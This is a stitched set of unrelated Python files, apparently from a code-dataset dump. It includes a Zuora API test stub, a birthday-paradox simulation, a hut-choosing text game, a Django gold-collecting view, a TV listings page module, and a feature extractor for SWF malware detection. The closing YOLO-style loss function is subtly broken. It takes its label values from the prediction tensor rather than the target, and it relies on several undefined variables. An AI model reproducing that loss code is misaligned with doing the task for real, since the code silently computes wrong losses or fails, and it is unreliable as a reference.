this account if an invoice or a credit memo is generated, as `yyyy-mm-dd`. | | memoItemAmount | 223.0 and earlier | [Create credit memo from charge](https://www.zuora.com/developer/api-reference/#operation/POST_CreditMemoFromPrpc \"Create credit memo from charge\"); [Create debit memo from charge](https://www.zuora.com/developer/api-reference/#operation/POST_DebitMemoFromPrpc \"Create debit memo from charge\") | Amount of the memo item. | | amount | 224.0 and later | [Create credit memo from charge](https://www.zuora.com/developer/api-reference/#operation/POST_CreditMemoFromPrpc \"Create credit memo from charge\"); [Create debit memo from charge](https://www.zuora.com/developer/api-reference/#operation/POST_DebitMemoFromPrpc \"Create debit memo from charge\") | Amount of the memo item. | | subscriptionNumbers | 222.4 and earlier | [Create order](https://www.zuora.com/developer/api-reference/#operation/POST_Order \"Create order\") | Container for the subscription numbers of the subscriptions in an order. | | subscriptions | 223.0 and later | [Create order](https://www.zuora.com/developer/api-reference/#operation/POST_Order \"Create order\") | Container for the subscription numbers and statuses in an order. | #### Version 207.0 and Later The response structure of the [Preview Subscription](https://www.zuora.com/developer/api-reference/#operation/POST_SubscriptionPreview \"Preview Subscription\") and [Update Subscription](https://www.zuora.com/developer/api-reference/#operation/PUT_Subscription \"Update Subscription\") methods are changed. The following invoice related response fields are moved to the invoice container: * amount * amountWithoutTax * taxAmount * invoiceItems * targetDate * chargeMetrics # Zuora Object Model The following diagram presents a high-level view of the key Zuora objects. Click the image to open it in a new tab to resize it. <a href=\"https://www.zuora.com/wp-content/uploads/2017/01/ZuoraERD.jpeg\" target=\"_blank\"><img src=\"https://www.zuora.com/wp-content/uploads/2017/01/ZuoraERD.jpeg\" alt=\"Zuora Object Model Diagram\"></a> See the following articles for information about other parts of the Zuora business object model: * <a href=\"https://knowledgecenter.zuora.com/CB_Billing/Invoice_Settlement/D_Invoice_Settlement_Object_Model\" target=\"_blank\">Invoice Settlement Object Model</a> * <a href=\"https://knowledgecenter.zuora.com/BC_Subscription_Management/Orders/BA_Orders_Object_Model\" target=\"_blank\">Orders Object Model</a> You can use the [Describe object](https://www.zuora.com/developer/api-reference/#operation/GET_Describe) operation to list the fields of each Zuora object that is available in your tenant. When you call the operation, you must specify the API name of the Zuora object. The following table provides the API name of each Zuora object: | Object | API Name | |-----------------------------------------------|--------------------------------------------| | Account | `Account` | | Accounting Code | `AccountingCode` | | Accounting Period | `AccountingPeriod` | | Amendment | `Amendment` | | Application Group | `ApplicationGroup` | | Billing Run | <p>`BillingRun`</p><p>**Note:** The API name of this object is `BillingRun` in the [Describe object](https://www.zuora.com/developer/api-reference/#operation/GET_Describe) operation and Export ZOQL queries only. Otherwise, the API name of this object is `BillRun`.</p> | | Contact | `Contact` | | Contact Snapshot | `ContactSnapshot` | | Credit Balance Adjustment | `CreditBalanceAdjustment` | | Credit Memo | `CreditMemo` | | Credit Memo Application | `CreditMemoApplication` | | Credit Memo Application Item | `CreditMemoApplicationItem` | | Credit Memo Item | `CreditMemoItem` | | Credit Memo Part | `CreditMemoPart` | | Credit Memo Part Item | `CreditMemoPartItem` | | Credit Taxation Item | `CreditTaxationItem` | | Custom Exchange Rate | `FXCustomRate` | | Debit Memo | `DebitMemo` | | Debit Memo Item | `DebitMemoItem` | | Debit Taxation Item | `DebitTaxationItem` | | Discount Applied Metrics | `DiscountAppliedMetrics` | | Entity | `Tenant` | | Gateway Reconciliation Event | `PaymentGatewayReconciliationEventLog` | | Gateway Reconciliation Job | `PaymentReconciliationJob` | | Gateway Reconciliation Log | `PaymentReconciliationLog` | | Invoice | `Invoice` | | Invoice Adjustment | `InvoiceAdjustment` | | Invoice Item | `InvoiceItem` | | Invoice Item Adjustment | `InvoiceItemAdjustment` | | Invoice Payment | `InvoicePayment` | | Journal Entry | `JournalEntry` | | Journal Entry Item | `JournalEntryItem` | | Journal Run | `JournalRun` | | Order | `Order` | | Order Action | `OrderAction` | | Order ELP | `OrderElp` | | Order Item | `OrderItem` | | Order MRR | `OrderMrr` | | Order Quantity | `OrderQuantity` | | Order TCB | `OrderTcb` | | Order TCV | `OrderTcv` | | Payment | `Payment` | | Payment Application | `PaymentApplication` | | Payment Application Item | `PaymentApplicationItem` | | Payment Method | `PaymentMethod` | | Payment Method Snapshot | `PaymentMethodSnapshot` | | Payment Method Transaction Log | `PaymentMethodTransactionLog` | | Payment Method Update | `UpdaterDetail` | | Payment Part | `PaymentPart` | | Payment Part Item | `PaymentPartItem` | | Payment Run | `PaymentRun` | | Payment Transaction Log | `PaymentTransactionLog` | | Processed Usage | `ProcessedUsage` | | Product | `Product` | | Product Rate Plan | `ProductRatePlan` | | Product Rate Plan Charge | `ProductRatePlanCharge` | | Product Rate Plan Charge Tier | `ProductRatePlanChargeTier` | | Rate Plan | `RatePlan` | | Rate Plan Charge | `RatePlanCharge` | | Rate Plan Charge Tier | `RatePlanChargeTier` | | Refund | `Refund` | | Refund Application | `RefundApplication` | | Refund Application Item | `RefundApplicationItem` | | Refund Invoice Payment | `RefundInvoicePayment` | | Refund Part | `RefundPart` | | Refund Part Item | `RefundPartItem` | | Refund Transaction Log | `RefundTransactionLog` | | Revenue Charge Summary | `RevenueChargeSummary` | | Revenue Charge Summary Item | `RevenueChargeSummaryItem` | | Revenue Event | `RevenueEvent` | | Revenue Event Credit Memo Item | `RevenueEventCreditMemoItem` | | Revenue Event Debit Memo Item | `RevenueEventDebitMemoItem` | | Revenue Event Invoice Item | `RevenueEventInvoiceItem` | | Revenue Event Invoice Item Adjustment | `RevenueEventInvoiceItemAdjustment` | | Revenue Event Item | `RevenueEventItem` | | Revenue Event Item Credit Memo Item | `RevenueEventItemCreditMemoItem` | | Revenue Event Item Debit Memo Item | `RevenueEventItemDebitMemoItem` | | Revenue Event Item Invoice Item | `RevenueEventItemInvoiceItem` | | Revenue Event Item Invoice Item Adjustment | `RevenueEventItemInvoiceItemAdjustment` | | Revenue Event Type | `RevenueEventType` | | Revenue Schedule | `RevenueSchedule` | | Revenue Schedule Credit Memo Item | `RevenueScheduleCreditMemoItem` | | Revenue Schedule Debit Memo Item | `RevenueScheduleDebitMemoItem` | | Revenue Schedule Invoice Item | `RevenueScheduleInvoiceItem` | | Revenue Schedule Invoice Item Adjustment | `RevenueScheduleInvoiceItemAdjustment` | | Revenue Schedule Item | `RevenueScheduleItem` | | Revenue Schedule Item Credit Memo Item | `RevenueScheduleItemCreditMemoItem` | | Revenue Schedule Item Debit Memo Item | `RevenueScheduleItemDebitMemoItem` | | Revenue Schedule Item Invoice Item | `RevenueScheduleItemInvoiceItem` | | Revenue Schedule Item Invoice Item Adjustment | `RevenueScheduleItemInvoiceItemAdjustment` | | Subscription | `Subscription` | | Taxable Item Snapshot | `TaxableItemSnapshot` | | Taxation Item | `TaxationItem` | | Updater Batch | `UpdaterBatch` | | Usage | `Usage` | # noqa: E501
OpenAPI spec version: 2018-08-23
Contact: docs@zuora.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import zuora_client
from zuora_client.models.proxy_create_unit_of_measure import ProxyCreateUnitOfMeasure # noqa: E501
from zuora_client.rest import ApiException
class TestProxyCreateUnitOfMeasure(unittest.TestCase):
"""ProxyCreateUnitOfMeasure unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testProxyCreateUnitOfMeasure(self):
"""Test ProxyCreateUnitOfMeasure"""
# FIXME: construct object with mandatory attributes with example values
# model = zuora_client.models.proxy_create_unit_of_measure.ProxyCreateUnitOfMeasure() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"jairo.velasco@alertlogic.com"
] | jairo.velasco@alertlogic.com |
6340dee6adbac9d8f5bda891d237f9e76491c8a4 | 44cdcb800301e68cbfe31e5c550ceaf592740783 | /Projects/birthday.py | b2404164f9fd759e8d21eda62405fca5ddf7fe53 | [] | no_license | cgu2022/NKC---Python-Curriculum | e945716e0a9f4d84bc89f8339a56e8f437da431d | 32abccd3417ecb033724c00e787caf5f2424c795 | refs/heads/master | 2021-06-19T15:29:10.607983 | 2021-05-01T12:37:48 | 2021-05-01T12:37:48 | 196,111,993 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,149 | py | import random
# function to generate birthday
def genBirthday():
numDays = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
num = random.randint(1, 365)
total = 0
monthCounter = 1
date = ""
while(num > total + numDays[monthCounter]):
total += numDays[monthCounter]
monthCounter += 1
day = num-total
date = str(monthCounter) + "/" + str(day)
return date
# function to simulate the birthday paradox
def simulate():
list = []
# adding 23 random dates to the list
for iterator in range(0, 23):
list.append(genBirthday())
hasTwoSameBirthday = False
# nested loop to compare every pair of dates
for i in range(0, 23):
for j in range(0, i):
# if two dates are the same, set hasTwoSameBirthday to true
if list[i] == list[j]:
hasTwoSameBirthday = True
return hasTwoSameBirthday
# function to simulate n times
def simulateN(n):
trueCounter = 0
for i in range(0, n):
if(simulate()):
trueCounter += 1
return str(round(100*(float)(trueCounter/n),2)) + "%"
# main
print(simulateN(100000))
| [
"noreply@github.com"
] | cgu2022.noreply@github.com |
9cbf4a3bca62efe29a5bbe29e089c41393a440e2 | 69649d74374ecb2e1fe1f7fcc276e07e9e53b534 | /LPAD/ch01_ex01.py | 3aa333ca62e2efe7ad4ce784419052574474f47e | [] | no_license | huilight/PythonPractice | 7d3a29f3dced6c1e4f0d7520a641fe9292d76910 | 4d22fa4e7c171fc73eb84d8fd9bc08c639356423 | refs/heads/master | 2020-06-21T08:09:55.344383 | 2019-09-09T15:13:41 | 2019-09-09T15:13:41 | 197,391,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,298 | py | import random
import textwrap
def show_theme_message(width=72):
show_dotted_line()
print("\033[lm"+"Attack of The Orcs v0.0.1:" + "\033[0m")
msg = (
"The war between humans and their arch enemies, Orcs, was in the "
"offing. Sir Foo, one of the brave knights guarding the southern "
"plains began a long journey towards the east through an unknown "
"dense forest. On his way, he spotted a small isolated settlement."
" Thired and hoping to replenish his food stock, he decided to take"
" a datour. As he approached the village, he saw five huts. There "
"was no one to be seen around. Hesitantly, he decided to enter..")
print(textwrap.fill(msg, width=width))
def show_game_mission():
print('\033[1m' + "Mission:" +"\033[0m")
print("\tChoose a hut where Sir Foo can rest...")
print("\033[1m" + "TIP:" + "\033[0m")
print("Be careful as there are enemies luking around!")
show_dotted_line()
def occupy_huts():
occupants = ['enemy', 'friend', 'unoccupied']
huts = []
# Randomly append 'enemy' or 'friend' or None to the huts list
while len(huts) < 5:
computer_choice = random.choice(occupants)
huts.append(computer_choice)
return huts
def process_user_choice():
# Prompt user to select a hut
msg = "\033[1m" + "Choose a hut number to enter (1-5):" + "\033[0m"
user_choice = input("\n" + msg)
idx = int(user_choice)
# Print the occupant info
print("Revealing the occupants...")
return idx
def reveal_occupants(idx, huts):
msg = ""
for i in range(len(huts)):
occupant_info = '<%d:%s>'%(i+1, huts[i])
if i + 1 == idx:
occupant_info = "\033[1m" + occupant_info + "\033[0m"
msg += occupant_info + " "
print("\t" + msg)
show_dotted_line()
def enter_hut(idx, huts):
print("\033[1m" + "Entering hut %d... "%idx + "\033[0m", end=" ")
# Determine and announce the winner
if huts[idx-1] == 'enemy':
print("\033[1m" + "YOU LOSE: (Better luck next time!)" +
"\033[0m")
else:
print("\033[1m" + "Congratulations! YOU WIN!!!" + "\033[0m")
show_dotted_line()
def print_bold(msg, end='\n'):
"""Print a string in 'bold' font"""
print("\033[1m" + msg + "\033[0m", end=end)
def show_dotted_line(width=72):
print('-' * width)
def reset_health_meter(health_meter):
health_meter['player'] = 40
health_meter['enemy'] = 30
def run_application():
keep_playing = 'y'
health_meter = {}
show_theme_message()
show_game_mission()
while keep_playing == 'y':
reset_health_meter(health_meter)
play_game(health_meter)
keep_playing = input("Play again? Yes(y)/No(n):")
def show_health(health_meter, bold=False):
msg = "Sir Foo: {}, Enemy: {}".format(health_meter['player'],
health_meter['enemy'])
if bold:
msg = "\033[1m" + msg + "\033[0m"
print(msg)
def play_game(health_meter):
huts = occupy_huts()
idx = process_user_choice()
reveal_occupants(idx, huts)
if huts[idx-1] != 'enemy':
print_bold("Congratulations! YOU WIN!!!")
else:
print_bold("ENEMY SIGHTED! ", end='')
show_health(health_meter, bold=True)
continue_attack = True
while continue_attack:
continue_attack = input("....continue attack? (y/n):")
if continue_attack == 'n':
print_bold("RUNNING AWAY with folloing health dtatus..")
show_health(health_meter, bold="True")
print_bold("Game Over!")
attack(health_meter)
if health_meter['enemy'] <= 0:
print_bold("Good Job! Enemy defeated! YOU WIN!!!")
break
if health_meter['player'] <= 0:
print_bold("YOU LOSE! Better luck next time")
break
def attack(health_meter):
hit_list = 4 * ['player'] + 6 * ['enemy']
injured_unit = random.choice(hit_list)
hit_points = health_meter[injured_unit]
injury = random.randint(10, 15)
health_meter[injured_unit] = max(hit_points-injury, 0)
print("ATTACK!", end='')
show_health(health_meter)
if __name__ == '__main__':
run_application() | [
"huilight@outlook.com"
] | huilight@outlook.com |
c2e6a84944b141b5dc77b21793f0cc3085caa4fe | ecdf38c65523c3b00251753174a664b720ce5fc4 | /ninja_money/views.py | 8e33e15712b186d99d23d20dc0137dcbdae735c5 | [] | no_license | mixelectronico/NinjaGold | 26e2faa7fffa58a142c5571288cebd893d4dab3e | 76fcae3814f7e9c6ed1fd2ad08624f7a3cf170b9 | refs/heads/master | 2023-07-22T13:31:33.988698 | 2021-08-28T01:34:52 | 2021-08-28T01:34:52 | 400,649,346 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,396 | py | from django.shortcuts import render, redirect
from random import randint
from datetime import datetime
# Create your views here.
def inicio(request):
if 'gold_amount' not in request.session:
request.session['gold_amount'] = 0
request.session['moves'] = []
return render(request, 'index.html')
def process_money(request):
time = datetime.now().strftime("%Y-%m-%d %H:%M:%S %p")
if "farm" in request.POST: #Si en el POST viene "farm"...
farmPrize = randint(10, 20) #Valor aleatorio entre 10 y 20
request.session['gold_amount'] += farmPrize
request.session['moves'].append([farmPrize, 'farm', time]) #Se suma el valor a la variable de la sesion
if "cave" in request.POST: #Si en el POST viene "cave"...
cavePrize = randint(5, 10)
request.session['gold_amount'] += cavePrize
request.session['moves'].append([cavePrize, 'cave', time])
if "house" in request.POST: #Si en el POST viene "house"...
housePrize = randint(5, 10)
request.session['gold_amount'] += housePrize
request.session['moves'].append([housePrize, 'house', time])
if "casino" in request.POST: #Si en el POST viene "casino"...
casinoPrize = randint(-50, 50)
request.session['gold_amount'] += casinoPrize
request.session['moves'].append([casinoPrize, 'casino', time])
return redirect('/') | [
"mixelectronico@gmail.com"
] | mixelectronico@gmail.com |
23d66a5c1b26f0be833b0793a9aab76578a5d77b | 88849505c8d71c5fcc8d18fe2da3aa93a97f1e0e | /pages/600.py | 7a5c3a37a75edf30e4cef3ad8e503f06dd6d6ea5 | [
"MIT"
] | permissive | mscroggs/KLBFAX | 5322e025c41b30c6f160699e742c988c9e47ea88 | 3aaaa0cfe3b9772caa0a87e639efd9bce5b6adf4 | refs/heads/master | 2021-04-09T16:38:08.581934 | 2018-06-25T12:18:23 | 2018-06-25T12:18:26 | 31,314,664 | 5 | 1 | null | 2017-07-26T19:21:13 | 2015-02-25T13:26:38 | Python | UTF-8 | Python | false | false | 6,229 | py | from page import Page
from functions import klb_replace
import url_handler
class TVPage(Page):
def __init__(self, page_num, channel, feed, day):
super(TVPage, self).__init__(page_num)
self.title = day+"'s TV: "+channel
self.in_index = False
self.channel = channel
self.page_num = page_num
self.feed = feed
self.day = day
pages.append([page_num,channel+" ("+day+")"])
self.feed_type = None
def generate_content(self):
from time import strptime, strftime
self.add_title(self.channel)
self.move_cursor(x=80-len(self.day))
self.add_text(self.day, bg="YELLOW", fg="BLUE")
self.move_cursor(x=0)
if self.feed_type == 1:
start_times = list()
start_times_formatted = list()
titles = list()
for item in self.feed['items']:
start_times.append(strptime(item['published'],"%m/%d/%Y %I:%M:%S %p"))
start_times_formatted.append(strftime("%H%M",strptime(item['published'],"%m/%d/%Y %I:%M:%S %p")))
titles.append(item['title'] )
for i in range(len(titles)):
if i == len(titles)-1 or (int(strftime("%y%m%d%H%M",start_times[i+1])) > int(self.now().strftime("%y%m%d%H%M"))):
self.add_text(start_times_formatted[i],fg="GREEN")
self.add_text(" "+klb_replace(titles[i]))
self.add_newline()
if self.feed_type == 2:
for prog in self.e.findall('programme'):
if int(prog.find('end').text)>int(self.now().strftime("%H%M")) or int(prog.find('start').text)>int(self.now().strftime("%H%M")) or self.day != "Today":
self.add_text(prog.find('start').text,fg="GREEN")
self.add_text(" "+klb_replace(prog.find('title').text))
self.add_newline()
def background(self):
from time import strptime, strftime
import feedparser
import datetime
rss_dict = {"642": "http://www.iplayerconverter.co.uk/wu/2/date/" + strftime("%Y-%m-%d") + "/rss.aspx",
"692": "http://www.iplayerconverter.co.uk/wu/2/date/" + (datetime.date.today() + datetime.timedelta(days=1)).strftime("%Y-%m-%d") + "/rss.aspx",
"644": "http://www.iplayerconverter.co.uk/wu/4/date/" + strftime("%Y-%m-%d") + "/rss.aspx",
"694": "http://www.iplayerconverter.co.uk/wu/4/date/" + (datetime.date.today() + datetime.timedelta(days=1)).strftime("%Y-%m-%d") + "/rss.aspx"
}
if self.page_num in rss_dict.keys():
rss_url = rss_dict[self.page_num]
self.feed = feedparser.parse(rss_url)
self.feed_type = 1
else:
from xml.etree import ElementTree
xml = url_handler.load(self.feed)
self.e = ElementTree.fromstring(xml)
self.feed_type = 2
pages = []
tv1 = TVPage("601","BBC1","http://bleb.org/tv/data/listings/0/bbc1.xml","Today")
tv2 = TVPage("602","BBC2","http://bleb.org/tv/data/listings/0/bbc2.xml","Today")
tv3 = TVPage("603","ITV","http://bleb.org/tv/data/listings/0/p_itv1.xml","Today")
tv4 = TVPage("604","Channel 4","http://bleb.org/tv/data/listings/0/ch4.xml","Today")
tv5 = TVPage("605","Channel 5","http://bleb.org/tv/data/listings/0/five.xml","Today")
tv6 = TVPage("606","ITV2","http://bleb.org/tv/data/listings/0/p_itv2.xml","Today")
tv7 = TVPage("607","S4C","http://bleb.org/tv/data/listings/0/s4c.xml","Today")
tv8 = TVPage("608","BBC4","http://bleb.org/tv/data/listings/0/bbc4.xml","Today")
tv9 = TVPage("609","Dave","http://bleb.org/tv/data/listings/0/dave.xml","Today")
tv10 = TVPage("610","More4","http://bleb.org/tv/data/listings/0/more4.xml","Today")
tv11 = TVPage("611","Film 4","http://bleb.org/tv/data/listings/0/film_four.xml","Today")
tv12 = TVPage("612","QVC","http://bleb.org/tv/data/listings/0/qvc.xml","Today")
tv13 = TVPage("613","E4","http://bleb.org/tv/data/listings/0/e4.xml","Today")
tv14 = TVPage("614","Challenge","http://bleb.org/tv/data/listings/0/challenge.xml","Today")
tv15 = TVPage("615","BBC News","http://bleb.org/tv/data/listings/0/bbc_news24.xml","Today")
tv16 = TVPage("616","BBC Parliament","http://bleb.org/tv/data/listings/0/bbc_parliament.xml","Today")
tv19 = TVPage("626","BBC1","http://bleb.org/tv/data/listings/1/bbc1.xml","Tomorrow")
tv20 = TVPage("627","BBC2","http://bleb.org/tv/data/listings/1/bbc2.xml","Tomorrow")
tv21 = TVPage("628","ITV","http://bleb.org/tv/data/listings/1/p_itv1.xml","Tomorrow")
tv22 = TVPage("629","Channel 4","http://bleb.org/tv/data/listings/1/ch4.xml","Tomorrow")
tv23 = TVPage("630","Channel 5","http://bleb.org/tv/data/listings/1/five.xml","Tomorrow")
tv24 = TVPage("631","ITV2","http://bleb.org/tv/data/listings/1/p_itv2.xml","Tomorrow")
tv25 = TVPage("632","S4C","http://bleb.org/tv/data/listings/1/s4c.xml","Tomorrow")
tv26 = TVPage("633","BBC4","http://bleb.org/tv/data/listings/1/bbc4.xml","Tomorrow")
tv27 = TVPage("634","Dave","http://bleb.org/tv/data/listings/1/dave.xml","Tomorrow")
tv28 = TVPage("635","More4","http://bleb.org/tv/data/listings/1/more4.xml","Tomorrow")
tv29 = TVPage("636","Film 4","http://bleb.org/tv/data/listings/1/film_four.xml","Tomorrow")
tv30 = TVPage("637","QVC","http://bleb.org/tv/data/listings/1/qvc.xml","Tomorrow")
tv31 = TVPage("638","E4","http://bleb.org/tv/data/listings/1/e4.xml","Tomorrow")
tv32 = TVPage("639","Challenge","http://bleb.org/tv/data/listings/1/challenge.xml","Tomorrow")
tv33 = TVPage("640","BBC News","http://bleb.org/tv/data/listings/1/bbc_news24.xml","Tomorrow")
tv34 = TVPage("641","BBC Parliament","http://bleb.org/tv/data/listings/1/bbc_parliament.xml","Tomorrow")
class TVIPage(Page):
def __init__(self):
super(TVIPage, self).__init__("600")
self.title = "TV & Radio Index"
def generate_content(self):
self.add_title("TV & Radio")
for i,page in enumerate(pages):
self.add_text(page[0], fg="RED")
self.add_text(" "+page[1])
if i%2==1:
self.add_newline()
else:
self.move_cursor(x=38)
tp = TVIPage()
| [
"matthew.w.scroggs@gmail.com"
] | matthew.w.scroggs@gmail.com |
21daa5d528707849248fcfffbb82c9a8cdcdc4f6 | 1f61bad833f54f0f1e72e9c3a47677b93ff43b9b | /ParametersParser.py | 8be2e42ff9084d4f5027dfd3b0fc6c4851f4dd06 | [] | no_license | nick627/MachineLearningMalwareDetection | 6611166fcfbc310ed11dc8c1957ac0c29f1d33cb | 333f28723583a1868c26d90d3cfbecfef562598c | refs/heads/master | 2020-12-12T03:36:22.358166 | 2020-01-15T08:25:47 | 2020-01-15T08:25:47 | 234,033,392 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,772 | py |
import sys, os
import re, csv
from yaswfp import swfparser
MALWARE_FOLDER = '\\malware\\'
NORMAL_FOLDER = '\\normal\\'
TAGS_FILE = 'tags.txt'
PARAMETERS_FILE = 'parameters.csv'
LABELS_FILE = 'labels.csv'
KEY_WORDS = ['ActionScript3',
'ExternalInterface',
'hexToBin',
'ToURL',
'loadBytes']
tags = []
def getTagsFromFile(filename):
with open(filename) as file:
filelines = [row.strip() for row in file]
return filelines
def getSignatureNumber(signature):
if(signature == 'CWS'):
return 0
if(signature == 'FWS'):
return 1
if(signature == 'ZWS'):
return 2
return 3
def getHeaderParameters(header):
parameters = [0] * 8
parameters[0] = header.FileLength
parameters[1] = header.FrameCount
parameters[2] = header.FrameRate
try:
parameters[3] = header.FrameSize[0]
parameters[4] = header.FrameSize[1]
parameters[5] = header.FrameSize[2]
parameters[6] = header.FrameSize[3]
except:
pass
if parameters[3] < 0:
parameters[3] = 0
if parameters[4] < 0:
parameters[4] = 0
if parameters[5] < 0:
parameters[5] = 0
if parameters[6] < 0:
parameters[6] = 0
parameters[7] = getSignatureNumber(header.Signature)
return parameters
def getBodyParameters(parser_tags):
global tags
parameters = []
tagsCount = [0] * len(tags)
numberOfIframes = 0
numberOfUrls = 0
keyWordsCount = [0] * len(KEY_WORDS)
for tag in parser_tags:
try:
index = tags.index(tag.name)
tagsCount[index] += 1
except:
pass
# counting number of the each key word
for i in range(0, len(KEY_WORDS)):
if KEY_WORDS[i] in str(tag):
keyWordsCount[i] += 1
urls = re.findall(r'http?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', str(tag))
numberOfUrls += len(urls)
iframes = re.findall(r'<iframe src=', str(tag))
numberOfIframes += len(iframes)
parameters.append(numberOfIframes)
parameters.append(numberOfUrls)
parameters += keyWordsCount
parameters += tagsCount
return parameters
def parseFile(filename, isMalware):
try:
parser = swfparser.parsefile(filename)
except:
print('[-] Can not parse the file')
return
parameters = getHeaderParameters(parser.header)
print(parameters)
parameters += getBodyParameters(parser.tags)
with open(PARAMETERS_FILE, "a", newline = "") as file:
writer = csv.writer(file)
writer.writerow(parameters)
with open(LABELS_FILE , "a", newline = "") as file:
writer = csv.writer(file)
writer.writerow([isMalware])
return
def getFileList(directoryName):
filenames = [os.path.join(directoryName, file)
for file in os.listdir(directoryName)]
return filenames
def main():
global tags
tags = getTagsFromFile(os.getcwd() + '\\' + TAGS_FILE)
#"""
filenames = getFileList(os.getcwd() + NORMAL_FOLDER)
for i in range(0, len(filenames)):
print('[*] Parsing of file (' + str(i) + ')', filenames[i])
parseFile(filenames[i], 0)
print('[+] File was successfully completed')
#"""
filenames = getFileList(os.getcwd() + MALWARE_FOLDER)
for i in range(0, len(filenames)):
print('[*] Parsing of file (' + str(i) + ')', filenames[i])
parseFile(filenames[i], 1)
print('[+] File was successfully completed')
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | nick627.noreply@github.com |
97ca46ca00e04fa7ebc437cc01b210f3ec956f47 | 0a2538e19103b5ffbb179709246b957ec69a4229 | /app/api/parsers.py | 450da81783e7ea1f012bab8de23054729a56611d | [] | no_license | johndpope/facecam-recognition | 1d8cf8c201d4c3115453d6116958ac52349868b3 | ff202b7ce2b5b8c9cc1e755be2d42603518b494d | refs/heads/master | 2023-05-30T14:11:11.639969 | 2020-07-09T18:25:47 | 2020-07-09T18:25:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py | from flask_restplus import reqparse
from werkzeug.datastructures import FileStorage
# Create our parser
my_parser = reqparse.RequestParser()
# Add parsing arguments
my_parser.add_argument('img',
location='files',
type=FileStorage,
required=True)
| [
"clemdecoop.pro@gmail.com"
] | clemdecoop.pro@gmail.com |
f2127ea102bdc9cf239348352ea3ae2b45fda7a5 | 3da5ea477d5b01809a9647ea949773a5a7d1782a | /Test.py | 13d700b116e885cf795d2b0b91ce2e2cedf96162 | [] | no_license | HeartBack/YDCGallery | e2b902b47eb5c966caae2d16a92f97c10878141e | 99a8db0cbf08420046d9d4fa5adb184ca836507c | refs/heads/master | 2020-12-02T11:15:26.897474 | 2017-07-09T10:31:41 | 2017-07-09T10:31:41 | 96,621,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 826 | py | import keyboard
import pyperclip
import os
from tkinter import *
import subprocess,os
def exe(pyfile,dest="",creator=r"E:\software\Python36\Scripts\pyinstaller.exe",ico=r"C:\Users\Yi\Desktop\ico.ico",noconsole=False):
insert=""
if dest:insert+='--distpath="{}"'.format(dest)
else: insert+='--distpath="./"'.format(os.path.split(pyfile)[0])
if ico: insert+=' --icon="{}" '.format(ico)
if noconsole: insert+=' --noconsole '
print(insert)
runstring='"{creator}" "{pyfile}" {insert} -F'.format(**locals())
subprocess.check_output(runstring)
def delet_file(dir):
for f in os.listdir(dir):
if f.endswith(".toc"):
os.remove(os.path.join(dir,f))
delet_file("C:\\Users\\Yi\\Desktop\\")
exe(pyfile='F:\\Python\\YDCGallery\\UI.py',dest='C:\\Users\\Yi\\Desktop\\UI',noconsole=True) | [
"Yi@Yi"
] | Yi@Yi |
1dffb0b8361ba0b1f56edaffd58b1fe54bca876f | 537cc3cd397900596be19e424d4eed8f57e611ea | /Basic/TemperatureConversion.py | 0464ff8fdaa0dffaf6644cfd9eedc6f90ec16a2f | [] | no_license | kushal200/python | d6dca96fc452d80181bcc0620e0889095e158d06 | 11d88936c3eacec10d2c717263b7a99f1ed270a1 | refs/heads/main | 2023-08-22T05:09:59.981135 | 2021-10-21T03:10:23 | 2021-10-21T03:10:23 | 405,541,327 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | tempC=float(input("Enter the vlaue of Celsius:"))
tempF=(tempC*1.8)+32
print("Conversion of celsius into fahrenheit is" ,tempF)
tempF=float(input("Enter the value of fahrenheit:"))
tempC=(tempF-32)/1.8
print("Conversion of fahrenheit into celsius is" ,tempC) | [
"kushal.shresth2057@gmal.com"
] | kushal.shresth2057@gmal.com |
59167cda4822d4d188f0b48379af89caca6a6189 | 9d4f706d1a92faad93f152e4e5e6c2e3cd05e3fd | /losses.py | 3062a8679832da9a7766d52894bfbaaef14b5074 | [] | no_license | mdrifaath786/object-detection_yolov4 | d4d35085158a79ba787340eb69bdab058cd95d40 | 6184f4c2815e70a3039dcf74dadd6e37a1d97401 | refs/heads/main | 2023-03-19T00:30:57.944967 | 2021-03-04T16:58:45 | 2021-03-04T16:58:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,330 | py | def loss(pred,target):
pred_xywh=pred[:,:,:,:,0:4]
pred_conf=pred[:,:,:,:,4:5]
pred_prob=pred[:,:,:,:,5:]
label_xywh=pred[:,:,:,:,0:4]
label_conf=pred[:,:,:,:,4:5]
label_prob=pred[:,:,:,:,5:]
ciou = tf.expand_dims(bbox_ciou(pred_xywh, label_xywh), axis=-1)
input_size = tf.cast(input_size, tf.float32)
bbox_loss_scale = 2.0 - 1.0 * label_xywh[:, :, :, :, 2:3] * label_xywh[:, :, :, :, 3:4] / (input_size ** 2)
ciou_loss = respond_bbox * bbox_loss_scale * (1 - ciou)
iou = bbox_iou(pred_xywh[:, :, :, :, np.newaxis, :], bboxes[:, np.newaxis, np.newaxis, np.newaxis, :, :])
max_iou = tf.expand_dims(tf.reduce_max(iou, axis=-1), axis=-1)
respond_bgd = (1.0 - respond_bbox) * tf.cast(max_iou < IOU_LOSS_THRESH, tf.float32)
conf_focal = tf.pow(respond_bbox - pred_conf, 2)
conf_loss = conf_focal * (respond_bbox * -(respond_bbox * tf.math.log(tf.clip_by_value(pred_conf, eps, 1.0)))+respond_bgd * -(respond_bgd * tf.math.log(tf.clip_by_value((1- pred_conf), eps, 1.0))))
prob_loss = respond_bbox * -(label_prob * tf.math.log(tf.clip_by_value(pred_prob, eps, 1.0))+(1 - label_prob) * tf.math.log(tf.clip_by_value((1 - pred_prob), eps, 1.0)))
ciou_loss = tf.reduce_mean(tf.reduce_sum(ciou_loss, axis=[1, 2, 3, 4]))
conf_loss = tf.reduce_mean(tf.reduce_sum(conf_loss, axis=[1, 2, 3, 4]))
prob_loss = tf.reduce_mean(tf.reduce_sum(prob_loss, axis=[1, 2, 3, 4]))
return ciou_loss, conf_loss, prob_loss
